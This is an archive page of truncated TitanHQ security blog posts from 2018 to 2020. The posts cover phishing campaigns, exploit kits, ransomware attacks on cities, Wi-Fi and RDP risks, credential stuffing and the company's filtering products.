issued an...
by G Hunt |
April 27, 2020 |
Cybersecurity News, Internet Security News
New research has recently been published which suggests there has been a lack of security awareness training for remote workers, even with the massive increase in people working from home due to the COVID-19 pandemic and the increased threat level. Many companies have had to make major changes to policies and allow most employees to work from home, even though doing so introduces cybersecurity risks. While this is seen by many as a temporary measure due to the pandemic, there is currently some debate about how long lockdown measures will be in place. It could well be many months before lockdowns are eased and there is a return to “normal” working life. It may also be difficult to convince workers to return to the office when measures are eased, or at least until a vaccine for the virus has been developed. That could well be a year or most likely much longer. In the meantime, remote workers are not just encountering the odd phishing email. These workers are being actively targeted by cybercriminals and APT groups. It is important to ensure that technical controls are up to scratch and are blocking threats but also to train workers to recognize threats such as phishing. Technical Controls Will Not Block 100% of Cybersecurity Threats Technical solutions can block most malware and phishing attacks on remote workers and will protect devices and the networks to which those devices connect. TitanHQ has developed two solutions that provide excellent protection from email and web-based threats, and there has been a massive increase in demand for those solutions during the COVID-19 pandemic from businesses and managed service providers (MSPs). When these solutions are coupled with other cybersecurity protections such as firewalls, antivirus software, and intrusion detection systems, businesses will be well protected; however, no matter how many layers are added to your defenses, security awareness training for remote workers should still be provided. Employees are the last line of defense and require training to help them identify threats that bypass your technical defenses. Employees are a Weak Link, but Neglecting Security Awareness Training for Remote Workers is a...
by G Hunt |
February 24, 2020 |
Internet Security News, Network Security
Phishing attacks are increasing and malware is a growing threat. A DNS filter adds an important level of protection to block these attacks. In this post we explain why. The Growing Threat from Malware and Phishing Attacks There are various methods used to deliver malware, but email remains one of the most common methods of distributing malware, either through malicious attachments or hyperlinks in emails that direct users to websites where malware is downloaded. The latter is a popular method of malware delivery as there is an increased chance that the hyperlink will not be detected as malicious by an email security solution. Various tactics are used to mask these URLs from email security solutions, such as adding the hyperlink to an attached file such as a PDF. The Emotet Trojan is one of the most prevalent threats and also one of the most dangerous. Emotet is primarily spread via email through a combination of attachments and malicious URLs. The Trojan is an information stealer capable of spreading across networks to infect other vulnerable devices. Removing the malware is problematic, as there are usually multiple devices infected. As soon as the malware is removed from one device, others on the network re-infect the cleaned machine. Emotet is also a malware downloader. Once all valuable information has been obtained post-infection, other malware variants such as the TrickBot Trojan and RYUK ransomware are downloaded. All devices infected with Emotet are added to the botnet. An analysis by the SpamHaus project revealed around 6,000 malicious URLs are emitted from infected devices, which act as compromise vectors. An advanced spam filter will ensure that the majority of malicious emails are blocked, but it is important not to totally rely on a spam filter alone to block email-based malware and phishing attacks. The key to a strong defense is to implement layered defenses. With overlapping layers of security, if one layer fails to block a threat, another is in place to provide protection. One of the most important additional protections against phishing attacks and email-based malware is a web filter. Why a Web Filter is so Important Phishing attacks have an...
by G Hunt |
December 31, 2019 |
Cybersecurity Advice, Internet Security News
Today there is an increasingly mobile workforce. Workers are able to travel and stay connected to the office and many employees are allowed to work remotely for at least some part of the week. While workers are in the office, security is not a problem for IT departments. Workers connect to the internal network, be that a wired or wireless network, and thanks to the protection of the firewall, their devices and the network are protected. The problem comes when workers move outside the protection of that firewall. Here IT departments struggle to ensure the same level of protection. When workers are travelling for work or are between the home and the office, they often connect to public Wi-Fi hotspots. Connecting to those hotspots introduces risks. While connected, sensitive information could potentially be disclosed which could be intercepted. Malware could also be inadvertently downloaded. When a connection is made to the work network, that malware could easily be transferred. Connecting to untrusted Wi-Fi networks is a major risk. These could be legitimate Wi-Fi services provided on public transport, in coffee shops, or city-wide Wi-Fi networks. While these networks may be safe, there is no telling who may be connected to that network. These Wi-Fi networks are often not monitored, and cybersecurity protections may be poor. There are several possible attack scenarios where an individual could perform malicious acts on users of the Wi-Fi network. One of the biggest risks is a man-in-the-middle attack. In this scenario, a Wi-Fi user will be connected to the network and will believe that they are securely accessing the internet, their email, or even the work network, when the reality is that their connection is anything but secure. A hacker could be listening in and could obtain information from that connection. Through ARP poisoning, a hacker could trick the Wi-Fi gateway and the user’s device into connecting, and traffic would be routed through the hacker’s device where it is intercepted. An attacker could also create an evil twin hotspot. Here a rogue hotspot is created that closely mimics the genuine hotspot. A Wi-Fi user may mistakenly connect to the evil...
by G Hunt |
November 14, 2019 |
Cybersecurity Advice, Internet Security News
The increase in cyberattacks on law firms has highlighted a need for greater security protections, especially to protect against phishing, malware, and ransomware. According to a recent Law.com report, more than 100 law firms are known to have experienced cyberattacks in the past five years: Cyberattacks that have resulted in hackers gaining access to sensitive information and, in many cases, employee, attorney, and client information. Investigations such as this are likely to uncover just a small percentage of successful cyberattacks, as many are resolved quietly and are not reported. Many law firms will be keen to keep a cyberattack private due to the potential damage it could do to a firm’s reputation. The reputation of a law firm is everything. As Law.com explained, there are different data breach reporting requirements in different states. If there is no legal requirement to report the data breaches, they will not be reported. That means that only if reportable information has potentially been compromised will the breach be reported to regulators or made public. It is therefore not possible to tell how many successful cyberattacks on law firms have occurred. However, there has been a steady rise in reported cyberattacks on law firms, as is the case with attacks on other industry sectors. Law.com’s figures are likely to be just the tip of the iceberg. From the perspective of cybercriminals, law firms are a very attractive target. The types of information stored on clients is incredibly valuable and can be used for extortion. Information on mergers and takeovers and other sensitive corporate data can be used to gain a competitive advantage. Cybercriminals are also well aware that if they can deploy ransomware and encrypt client files, there is a higher than average probability that the ransom will be quietly paid. Based on the information that has been made public about law firm data breaches, one of the main ways that law firms are attacked is via email. Many of the data breaches started with a response to a phishing or spear phishing email. Phishing allows cybercriminals to bypass even sophisticated cybersecurity protections as it targets a well-known...
by G Hunt |
October 21, 2019 |
Internet Security News, Web Filtering
The Spelevo exploit kit is being used to deliver Maze ransomware to unsuspecting internet users via a vulnerability in Adobe Flash Player. The Spelevo exploit kit has been used to deliver a variety of malicious payloads since it was first detected in early 2019. Initially it was used to silently download the GootKit Trojan, and latterly the Dridex and IceD banking Trojans. Now the threat actors behind Maze ransomware have joined forces with the EK developers to deliver their malicious payload. Spelevo has previously been loaded onto a compromised business-to-business contact website to target business users, although the latest campaign uses ad network traffic to send users to a fake cryptocurrency website, where they are then redirected to a web page hosting the exploit kit. The Flash Vulnerability – CVE-2018-15982 – is then exploited in the browser to silently download and execute the ransomware payload. If that download occurs, the user’s files will be encrypted. There is currently no free decryptor for Maze ransomware. Recovery will depend on restoring files from backups – provided they too have not also been encrypted – or the user will face permanent file loss if they do not pay the ransom demand. The ransom doubles if payment is not made within a week. Exploit kits used to be one of the main ways that malware was distributed, although they fell out of favor with cybercriminals who found alternate, more profitable ways to earn money. The threat never disappeared but exploit kit activity dropped to a tiny fraction of the level seen a few years ago when Angler exploit kit activity was at its peak. However, over the past year or so, exploit kit activity has been increasing. Today, there are several active exploit kits that are being used to deliver a variety of malware and ransomware payloads. Exploit kits will only work if they have been loaded with an exploit for a vulnerability that has not been patched on a user’s device. Prompt patching will ensure that even if a user lands on a web page hosting an exploit kit, no malware download will take place. However, many businesses are slow to apply patches and it can be several months before...
by G Hunt |
August 27, 2019 |
Cybersecurity News, Internet Security News
A new phishing campaign has been detected which uses Microsoft Office 365 voicemail notifications as a lure to get users to open a malicious HTML file attached to the email. The phishing emails are very realistic. The emails include the Microsoft and Office 365 logos, use the Microsoft color scheme, and Microsoft contact information. The messages inform the recipient that they have received a new voicemail message. The caller’s number and length of the voicemail message is included, along with the time and date of the message. In order to access that message, the user is required to open a HTML file attached to the email. Many phishing campaigns use Word documents or Excel spreadsheets containing malicious macros or embedded hyperlinks that direct users to a phishing web page where credentials are harvested. Through security awareness training employees are told to look out for thee commonly used file types. HTML files are likely to be familiar to employees, but since these file types are not often used in phishing campaigns, employees may believe the attached file to be benign, when that is definitely not the case. The HTML file uses meta refresh to redirect the user from the local HTML file to a phishing page hosted on the Internet. That phishing page contains a highly realistic spoofed voicemail management page where users are required to enter their Office 365 credentials to access the message. Doing so hands those credentials to the attacker. Cybercriminals are constantly coming up with new ways to trick employees into clicking links in emails or opening malicious attachments. Keeping the workforce up to date on these threats is important. If employees are aware of the types of scam emails, they are likely to receive they will be more likely to correctly identify an email as malicious if it arrives in their inbox. Keeping the workforce 100% up to date on the latest scams will not be possible as new scams and lures are constantly being developed. It is therefore important to ensure that you have an advanced spam filtering solution in place that can block these messages to ensure they never test employees. SpamTitan incorporates DMARC to block email...
by G Hunt |
July 12, 2019 |
Cybersecurity Advice, Internet Security News
A Google Calendar phishing campaign is being conducted that abuses trust in the app to get users to click malicious hyperlinks. Cybercriminals are constantly developing new phishing tactics to convince end users to click links in emails or open email attachments. These campaigns are often conducted on organizations using Office 365. Campaigns are tested on dummy Office 365 accounts to make sure messages bypass Office 365 spam defenses. Messages are carefully crafted to maximize the probability of an individual clicking the link and the sender name is spoofed to make the message appear to have been sent from a known and trusted individual. Businesses that implement email security solutions that incorporate DMARC authentication can block the vast majority of these email spoofing attacks. Office 365 users that use a third-party anti-phishing solution for their Office 365 accounts can make sure malicious messages are blocked. Along with end user training, it is possible to mount a solid defense against phishing and email impersonation attacks. A new phishing tactic is being used in an active campaign targeting businesses which achieves the same aim as an email-based campaign but uses a personal calendar app to do so. Phishing campaigns have one of two main aims – To steal credentials for use in a further attack or to convince the user to install some form of malware or malicious code. This is most commonly achieved using an embedded hyperlink in the email that the user is urged to click. In the Google Calendar phishing attacks, events are added into app users’ calendars along with hyperlinks to the phishing websites. This is possible because the app adds invites to the calendar agenda, even if the invite has not been accepted by the user. All the attacker needs to do is send the invite. As the day of the fictitious event approaches, the user may click the link to find out more. To increase the likelihood of the link being clicked, the attacker sets event reminders so the link is presented to the user on multiple occasions. This attack method is only possible with Google Calendar in its default setting. Unfortunately, many users will not have updated their settings...
by G Hunt |
June 24, 2019 |
Cybersecurity News, Internet Security News
While it is good news the GandCrab ransomware operation has been shut down, ransomware attacks are on the rise and a new threat has been detected: Buran ransomware. Buran ransomware lacks some of the common features of more successful ransomware strains. The ransomware does not make any attempt to hide its activity and it doesn’t attempt to hamper recover by deleting Windows shadow copies. However, it is capable of encrypting a wide range of file types and there is currently no free decryptor available to unlock encrypted files. Buran ransomware is being spread via the RIG exploit kit, with traffic to that exploit kit generated using a malvertising campaign. Malicious adverts have been injected into legitimate ad networks and are being displayed on a range of different websites. The malvertising campaign was identified by security researcher nao_sec. The malvertising campaign directs web browsers to a domain hosting RIG, which attempts to exploit several vulnerabilities in Internet Explorer. If an unpatched vulnerability exists, Buran ransomware will be downloaded and executed. An analysis of the malware suggests it is a new variant of Vega ransomware that was previously used in a campaign in Russia. While Buran ransomware may not be a long-term successor to GandCrab ransomware, there are many threat actors moving to fill the void. Sodinokibi ransomware attacks are increasing and the ransomware developers are also using a malvertising campaign on the PopCash ad network to deliver traffic to domains hosting the RIG exploit kit. Exploit kits can only download malware if they have been loaded with an exploit for a vulnerability that has not been patched on a visitor’s computer. The primary defense against these attacks is to ensure that all Windows security updates are applied promptly, along with updates and patches for plugins and other browsers. There is invariably a delay between a patch being issued and all devices being updated. To provide protection until patches are applied, and to protect against zero-day exploits, a web filtering solution is recommended. A web filter can be used to control the websites that can be visited by employees and can block...
by G Hunt |
May 29, 2019 |
Cybersecurity News, Internet Security News
TitanHQ is a leading provider of email security, web security, and email archiving solutions to SMBs and managed service providers (MSPs) serving the SMB market. Over the past five years, TitanHQ has significantly expanded its customer base and its solutions now protect over 7,500 businesses and are offered by more than 1,500 MSPs around the world. TitanHQ works closely with European partners and businesses and has been expanding its footprint throughout the EU. TitanHQ is working towards becoming the leading email and web security solution provider in Europe and as part of that process, the company has recently entered into a new partnership with the French Value Added Distributor Exer. Exer is one of the leading VADs in France and works with more than 600 value added resellers and integrators in the country. The company specializes in network security, mobile security, Wi-Fi and managed cybersecurity services and helps French VARs better serve their clients. Under the new partnership agreement, Exer will start offering TitanHQ’s three cloud-based solutions to French VARs: SpamTitan, WebTitan, and ArcTitan. SpamTitan is an award-winning spam filtering solution that keeps inboxes free from spam emails and malicious messages. The solution is regularly updated to incorporate further controls to ensure that it continues to provide superior protection against an ever-changing email threat landscape. The solution now blocks more than 7 billion spam and malicious messages every month and helps to keep businesses protected from phishing and malware attacks. WebTitan is a cloud-based DNS filtering solution that protects businesses from a wide range of malicious web content. The solution can also be used to carefully control the types of web content that users can access through company wired and wireless networks. The solution now blocks more than 60 million malicious websites every month and prevents malware downloads, controls bandwidth use, and enforces acceptable internet usage policies, . ArcTitan is a cloud-based email archiving solution that helps businesses securely store emails to ensure compliance with government and EU regulations. The solution now archives...
by G Hunt |
May 7, 2019 |
Internet Security News, Network Security
A new version of WebTitan Cloud has been released by TitanHQ. WebTitan Cloud 4.12 offers existing and new customers the opportunity to set filtering controls by location, in addition to setting organization-wide policies and role and departmental policies via links to Active Directory/LDAP. The new feature will be especially useful to MSPs and companies with remote workers, satellite offices, bases in multiple locations, and operations in overseas countries. Organization-wide web filtering policies can be set to prevent users from accessing illegal web content and pornography, but oftentimes, the one size fits all approach does not work for web filtering. The new location filter helps solve this. MSPs can use this new feature to set web filtering controls for customers in different locations while businesses using WebTitan Cloud can easily set a range of different policies for all users from a specific location, whether those users are accessing the Internet on or off the network. There will naturally be times when policies need to be bypassed to enable specific tasks to be completed. Rather than making temporary changes to location or other policies, WebTitan Cloud uses cloud keys which allow policy-based controls to be temporarily bypassed. Accompanying the location-based controls are new reporting options which allow administrators to quickly access information about web views and blocked access attempts in real time. While reports can be useful, oftentimes information needs to be accessed quickly. To help administrators find the information they need, search functionality has been enhanced. Administrators can use the search filter on the history page to search by location name. For MSPs this allows a specific customer to be selected and for traffic information at a specific location to be quickly viewed in real time, without having to generate a report. Location-based when filtering policies can be set and viewed for all locations through the same user interface, giving administers full visibility into traffic and settings of all customers through a single pane of glass. It is hoped that these updates will make WebTitan even more useful for businesses and...
by G Hunt |
January 21, 2019 |
Cybersecurity News, Internet Security News
The Fallout exploit kit, a toolkit used to silently deliver ransomware and malware to vulnerable devices, was first identified in September 2018. Between September and December, the toolkit was used to exploit vulnerabilities and deliver GandCrab ransomware and other malicious payloads. Towards the end of the year, the vulnerabilities most commonly exploited were a remote code execution vulnerability in the Windows VBScript engine (CVE-2018-8174) and the use-after-free vulnerability in Adobe Flash Player (CVE-2018-4878). Around December 27, 2018, Fallout exploit kit activity stopped, but only for a few days. Now the exploit kit is back, and several updates have been made including the addition of HTTPS support, a new landing page format, and PowerShell-based malware downloads. A new exploit has also been added for a zero-day use-after-free Adobe Flash player vulnerability (CVE-2018-15982) which was patched on December 5, 2018: A vulnerability also exploited by the Underminer exploit kit. The Fallout exploit kit is primarily delivered via malvertising campaigns – malicious adverts on third-party ad networks that are served on a variety of legitimate websites. The adverts redirect users to the exploit kit, which probes for vulnerabilities and exploits them to silently deliver malware or ransomware. The updated version of the Fallout exploit kit is delivering the latest version of GandCrab ransomware, for which there is no free decryptor. In addition to GandCrab ransomware, the Fallout exploit kit is delivering ServHelper, AZORult, TinyNuke, Dridex and Smokebot malware. The malvertising campaigns used to generate traffic to the exploit kit include TrafficShop, Popcash, RevenueHits, and HookAds. The latter is primarily used on high-traffic adult websites that are visited millions of times a month. Users are redirected to a decoy adult site that contains the exploit kit and would be unaware that anything untoward has happened. If there is an unpatched vulnerability for which fallout has an exploit, the ransomware or malware payload will be silently downloaded. Exploit kit activity is now much lower than in 2016 when EKs were extensively used to deliver malware, but...
by G Hunt |
December 12, 2018 |
Cybersecurity Advice, Internet Security News
It is straightforward to implement security controls to protect wired networks, but many businesses fail to apply the same controls to improve WiFi security, often due to a lack of understanding about how to improve wireless access point security. In this post we cover some of the main threats associated with WiFi networks and explain how easy it can be to improve wireless access point security. Wireless Access Points are a Security Risk Most businesses now apply web filters to control the types of content that can be accessed by employees on their wired networks but securing wireless networks can be more of a challenge. It is harder to control and monitor access and block content on WiFi networks. Anyone within range of the access point can launch an attack, especially on public WiFi hotspots which have one set of credentials for all guest users. It is therefore essential that controls are implemented to improve wireless access point security and protect users of the WiFi network. WiFi Security Threats A single set of credentials means cybercriminals are afforded a high degree of anonymity. That allows them to use WiFi networks to identify local network vulnerabilities virtually undetected. They could conduct brute force attacks on routers, for example, or use WiFi access to inject malware on servers that lack appropriate security. If access is gained to the router, attacks can be launched on connected devices, and malware can be installed on multiple end points or even POS systems to steal customers’ credit/debit card information. The cyberattack on Dyn is a good example of how malware can be installed and used for malicious purposes. The DNS service provider was attacked which resulted in large sections of the Internet being made inaccessible. A botnet of more than 100,000 compromised routers and IoT devices was used in the attack. Man-in-the-Middle attacks are also common on Wi-Fi networks. Any unencrypted content can be intercepted, such as if information is exchanged between a user and a HTTP site, rather than HTTPS, if a VPN is not used. Public WiFi networks are often used for all manner of nefarious purposes due to the anonymity provided. If users take...
by G Hunt |
December 6, 2018 |
Cybersecurity Advice, Internet Security News
A credential stuffing attack has led to a Dunkin Donuts data breach which has seen some customer data compromised. While the breach was limited and most attempts to access customers’ DD Perks accounts were blocked, the incident does highlight the risks of password reuse. It is unclear exactly how many customers have been affected, but for certain customers, the attackers may have gained access to their DD perks accounts – The loyalty program run by the donut company. The Dunkin Donuts data breach was limited to first and last names, email addresses, DD Perks account numbers, and QR codes. The method used to gain access to customers DD perks accounts was unsophisticated, cheap to conduct, and in the most part can be conducted automatically. Low cost and little effort makes for a winning combination for hackers. The Dunkin Donuts data breach did not involve internal systems and no credentials were stolen from the donut giant. Customers’ usernames (email addresses) and passwords were obtained from security breaches at other companies. Those usernames and passwords were then utilized in an automated attack on Dunkin Donuts customers’ DD Perks accounts. Dunkin Donuts has performed a password reset and affected users will be required to choose a new password. New DD Perks account numbers will be given to affected customers and their card balances will be transferred to the new account. Since Dunkin Donuts did not expose any passwords and its systems remained secure, the only individuals that will have been affected are those that have used the same password for their DD Perks account that they have used on other online platforms. The Risks of Password Reuse Hackers obtain credentials from multiple data breaches, compile the data to create a list of passwords that have previously been used with a specific email address, then conduct what is known as a credential stuffing attack. Multiple login attempts are made using the different passwords associated with an email address. The Dunkin Donuts data breach demonstrates the importance of good password hygiene and the risks of password reuse. Every user account must be secured with a strong, unique password – One that has...
by G Hunt |
November 29, 2018 |
Cybersecurity News, Internet Security News
A Starbucks porn filter will finally be introduced in 2019 to prevent adult content from being accessed by customers hooked up to the coffee shop chain’s free WiFi network. It has taken some time for the Starbucks porn filter to be applied. In 2016, the coffee shop chain agreed to implement a WiFi filtering solution following a campaign from the internet safety advocacy group Enough is Enough, but two years on and a Starbucks porn filter has only been applied in the UK. Businesses Pressured to Implement WiFi Filters to Block Porn Enough is Enough launched its Porn Free WiFi campaign – now renamed the SAFE WiFi campaign – to pressure businesses that offer free WiFi to customers to apply WiFi filters to restrict access to adult content. In 2016, more than 50,000 petitions were sent to the CEO’s of Starbucks and McDonalds urging them to apply WiFi filters and take the lead in restricting access to pornography and child porn on their WiFi networks. After petitioning McDonald’s, the global restaurant chain took prompt action and rolled out a WiFi filter across its 14,000 restaurants. However, Starbucks has been slow to take action. Following the McDonalds announcement in 2016, Starbucks agreed to roll out a WiFi filter once it had determined how to restrict access to unacceptable content without involuntarily blocking unintended content. Until the Starbucks porn filter was applied, the coffee shop chain said it would reserve the right to stop any behavior that negatively affected the customer experience, including activities on its free WiFi network. The apparent lack of action prompted Enough is Enough to turn up the heat on Starbucks. On November 26, 2018, Enough is Enough president and CEO, Donna Rice Hughes, issued a fresh call for a Starbucks porn filter to be implemented and for the coffee chain to follow through in its 2016 promise. Rice Hughes also called for the public to sign a new petition calling for the Starbucks porn filter to finally be put in place. Starbucks Porn Filter to Be Applied in All Locations in 2019 Starbucks has responded to Enough is Enough, via Business Insider, confirming that it has been testing a variety of WiFi filtering solutions...
by G Hunt |
November 8, 2018 |
Cybersecurity Advice, Internet Security News
Most businesses are aware of the importance of securing their Wi-Fi networks; however, in some industry sectors Wi-Fi security has not been given the importance it requires. Wi-Fi security for hotels, for instance, is often lacking, even though the hospitality sector is being actively being targeted by cybercriminals who see hotel Wi-Fi as a rich picking ground. Hotel Chains are Under Attack Hotels are an attractive target for cybercriminals. They satisfy the two most important criteria for cybercriminals when selecting targets. Valuable data that can be quickly turned into profit and relatively poor cybersecurity which makes conducting attacks more straightforward. In 2018, there have been several major cyberattacks on hotel groups. In November 2018, Federal Group, which runs luxury hotels in Tasmania, experienced an email security incident that exposed the personal data of some of its members. A cyberattack on the Radisson Hotel Group was also reported. In that case it resulted in the exposure of the personal information of its loyalty program members. In August one of China’s largest chains of hotels – Huazhu Hotels Group Ltd – which operates 13 hotel brands – suffered a cyberattack that affected an estimated 130 million people. In June one of Japan’s largest hotel groups, Prince Hotels & Resorts, experienced a cyberattack that impacted almost 125,000 customers. In 2017 there were major data breaches at Hilton, Hyatt Hotels Corporation, Trump Hotels, Four Seasons Hotels, Loews Hotels, Sabre Hospitality Solutions, and InterContinental Hotels Group to name but a few. The Cost of a Hotel Data Breach When a data breach occurs the costs quickly mount. Access to data and networks must be blocked rapidly, the breach must be investigated, the cause must be found, and security must be improved to address the vulnerabilities that were exploited. That invariably requires consultants, forensic investigators and other third-party contractors. Affected individuals must be notified and credit monitoring and identity theft protection services may need to be offered. The direct costs of a hotel data breach are considerable. The Ponemon Institute calculated the...
by G Hunt |
October 26, 2018 |
Cybersecurity News, Internet Security News
This year has seen several ransomware attacks on cities and municipal targets, clearly demonstrating that the threat from ransomware has not abated, despite several analyses from cybersecurity firms that suggest hackers are moving away from ransomware and concentrating on cryptomining malware attacks. Cryptocurrency miners have certainly become more popular and their use has increased substantially in recent months, but there is still a significant threat from ransomware. Ransomware development may have slowed, but ransomware attacks on cities and other high value targets have not. In fact, October has seen two new ransomware attacks on cities in the United States, along with several attacks on municipal targets. In the past few months. It is clear that the threat is not going away any time soon. $2,000 Ransom Paid to Resolve City of West Haven Ransomware Attack The city of West Haven ransomware attack started on the morning of October 16, 2018, and by the time the attack had been contained, 23 servers had been encrypted and taken out of action. Prompt action limited the scope of the attack, although it did cause major disruption as computers on the affected network had to all be shut down. The attack affected a critical system, and after an assessment of the situation, the decision was taken to pay the ransom. Considering the number of servers affected, the ransom demand was relatively low. The city paid $2,000 in Bitcoin for the keys to decrypt its files. Art House, Connecticut’s chief of cybersecurity, explained that this was one of several targeted ransomware attacks on cities and municipal services in the state in recent weeks. In February, around 160 computers were affected by ransomware in more than a dozen agencies in the state according to the Department of Administrative Services, and a month later the state’s Judicial Branch was attacked and had more than 100 servers encrypted. City of Muscatine Ransomware Attack The West Haven ransomware attack was shortly followed by a ransomware attack on the city of Muscatine in Ohio, which saw files on several government servers encrypted. The attack is understood to have started on October 17 and caused...
by G Hunt |
October 17, 2018 |
Cybersecurity News, Internet Security News
TitanHQ, the leading provider of web filtering, spam filtering, and email archiving solutions for managed service providers (MSPs) recently partnered with Datto Networking, the leading provider of IT solutions to SMBs delivered through MSPs. Datto Networking has now incorporated TitanHQ’s advanced web filtering technology into the Datto Networking Appliance to provide superior protection to users on the network. Datto and TitanHQ will be hosting a webinar on October 18, 2018 to explain how the new technology provides enhanced protection from web-based threats, and how MSPs can easily deliver content filtering to their customers. During the webinar, MSPs will find out about the enhanced functionality of the Datto Networking Appliance. Webinar: Datto Networking & Titan HQ Deliver Enhanced Web Content Filtering Date: Thursday, October 18th Time: 11AM ET | 8AM PT | 4PM GMT/BST Speakers: John Tippett, VP, Datto Networking Andy Katz, Network Solutions Engineer Rocco Donnino, EVP of Strategic Alliances, TitanHQ
by G Hunt |
October 8, 2018 |
Cybersecurity News, Internet Security News
The CloudFlare IPFS gateway has only recently been launched, but it is already being used by phishers to host malicious content.Cloudflare IPFS gateway phishing attacks are likely to have a high success rate, as some of the checks performed by end users to confirm the legitimacy of domains will not raise red flags. The IPFS gateway is a P2P system that allows files to be shared easily throughout an organization and accessed through a web browser. Content is distributed to different nodes throughout the networked systems. The system can be used for creating distributed websites, and CloudFlare has made this process easier by offering free SSL certificates and allowing domains to be easily connected to IPFS. If phishers host their phishing forms on CloudFlare IPFS, they benefit from CloudFlare’s SSL certificate. Since the phishing page will start with cloudflare-ipfs.com, this adds legitimacy. The CloudFlare-owned domain is more likely to be trusted than domains owned by phishers. When CloudFlare IPFS Gateway phishing forms are encountered, visitors will be advised that the webpage is secure, the site starts with HTTPS, and a green padlock will be displayed. If the visitor takes the time to check certificate information of the web page, they will find it has been issued to CloudFlare-IPFS.com by CloudFlare Inc., and the certificate is valid. The browser will not display any warning and CloudFlare IPFS Gateway phishing content will therefore seem legitimate. At least one threat actor is using the CloudFlare IPFS Gateway for phishing and is hosting forms that claim to be standard login pages for Office 365, DocuSign, Azure AD, and other cloud-based services, complete with appropriate logos. If a visitor completes the form information, their credentials will be forwarded to the operator of a known phishing domain – searchurl.bid – and the user will be displayed a document about business models, strategy and innovation. This may also not raise a red flag. The CloudFlare IPFS Gateway phishing strategy is similar to that used on Azure Blob storage, which also take advantage of legitimate SSL certificates. In that case the certificate is issued by Microsoft. It...
by G Hunt |
September 30, 2018 |
Cybersecurity Advice, Internet Security News
Windows Remote Desktop Protocol attacks are one of the most common ways cybercriminals gain access to business networks to install backdoors, gain access to sensitive data, and install ransomware and other forms of malware. This attack method has been increasing in popularity over the past two years and there has also been a notable rise in darknet marketplaces selling exposed RDP services and RDP login credentials. The high number of Remote Desktop Protocol attacks has prompted the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) and the Department of Homeland Security to issue an alert to businesses in the United States to raise awareness of the threat. Remote Desktop Protocol is a proprietary Windows network protocol that allows individuals to remotely access computers and servers over the Internet and gain full control of resources and data. RDP is often used for legitimate purposes, such as allowing managed security service providers (MSSPs) and managed service providers (MSPs) to remotely access devices to provide computer support without having to make a site visit. Through RDP, input such as mouse movements and keystrokes can be transmitted over the Internet with a graphical user interface sent back. In order to gain access to a machine using RDP, a user must be authenticated by supplying a username and password. Once a user is authenticated, the resources on that device can be accessed. While authorized individuals can use RDP connections, so too can cybercriminals if they have access to login credentials or are able to guess usernames and passwords. As with any software, RDP can contain flaws. For instance, flaws in the CredSSP encryption mechanism could be exploited to perform man-in-the-middle attacks. Cybercriminals are identifying vulnerable RDP sessions over the Internet and are exploiting them to gain access to sensitive information and conduct extortion attacks. The threat actors behind SamSam ransomware, which has been used in many attacks on U.S. businesses, educational institutions, and healthcare providers, often gain access to networks through brute force attempts to guess weak passwords. The threat actors...
by G Hunt |
September 20, 2018 |
Cybersecurity News, Internet Security News
Recent research has shown that the United States is the main distributor of exploit kits and hosts the most malicious domains and cyberattacks on websites have increased sharply. United States Hosts the Most Malicious Domains and Exploit Kits The United States hosts the most malicious domains and is the number one source for exploit kits, according to new research conducted by Palo Alto Networks. Further, the number of malicious domains increased between Q1 and Q2 in the United States. In all countries, apart from the Netherlands, the number of malicious domains remained constant or declined. Exploit activity is only at a fraction of the level of 2016, although the web-based kits still pose a major threat to businesses with poor patching processes and a lack of protections against web-based attacks. Three exploit kits have been extensively used throughout Q1 and Q2, 2018: Sundown, Rig, and KaiXin. The United States is the number one source for the Sundown and Rig EKs and is number two behind China for the KaiXin exploit kit. Further, a new exploit kit was detected in Q2: Grandsoft. The United States is also the number one source for this new exploit kit. More than twice the number of exploit kits are hosted in the United States than in Russia in second place. 495 malicious URLs were detected in the United States compared to 147 in Russia. 296 malicious URLs hosting exploit kits were detected in the United States, with Russia in second place with 139. The Microsoft VBScript vulnerability, CVE-2018-8174, is being extensively exploited via these exploit kits. Microsoft released a patch in May 2018 to fix the flaw, but many companies have yet to install the update and are vulnerable to attack. Exploit kits are still using old vulnerabilities to install their malicious payloads. According to Palo Alto Networks’ Unit 42, two vulnerabilities are extensively used – The IE7 vulnerability – CVE-2009-0075 – and the Internet Explorer 5 vulnerability – CVE-2008-4844 – even though patches were released to fix the flaws more than 9 years ago. The Jscript vulnerability in Internet Explorer 9 through 11 – CVE-2016-0189 – and the OleAut32.dll...
by G Hunt |
August 15, 2018 |
Cybersecurity News, Internet Security News
There has been a marked rise in HTTPS phishing website detections, phishing attacks are increasing, and the threat of phishing attacks is greater than ever before. Phishing is the biggest cyber threat that businesses must now deal with. It is the easiest way for cybercriminals to gain access to email accounts for business email compromise scams, steal credentials, and install malware. The Threat from Phishing is Getting Worse The Anti-Phishing Working Group – an international coalition of government agencies, law enforcement, trade associations, and security companies – recently published its phishing trends activity report for Q1, 2018. The report shows that the threat from phishing is greater than ever, with more phishing websites detected in March 2018 than at any point in the past year. In the first half of 2017, there was an average of 48,516 phishing websites detected each month. The figure rose to 79,464 phishing websites detected on average per month in the second half of the year. In the first quarter of 2018, there was an average of 87,568 phishing websites detected, with detections peaking in March when more than 115,000 phishing sites were identified. The number of unique phishing reports received in Q1, 2018 (262,704) was 12.45% higher than in the final quarter of 2017. Healthcare Industry Heavily Targeted In the United States, the Health Insurance Portability and Accountability Act (HIPAA) requires healthcare providers, health insurers, healthcare clearinghouses and business associates of HIPAA-covered entities to report breaches of protected health information within 60 days of the discovery of the breach. The main enforcer of HIPAA compliance, the Department of Health and Human Services’ Office for Civil Rights (OCR), publishes summaries of those breach reports. Those summaries show just how serious the threat from phishing is. HIPAA-covered entities and business associates have reported 45 email hacking incidents in 2018 – 21.68% of all breaches reported. Phishers Make the Move to HTTPS PhishLabs, an anti-phishing vendor that provides a security awareness training and phishing simulation platform, has been tracking HTTPS...
by G Hunt |
July 30, 2018 |
Cybersecurity News, Internet Security News
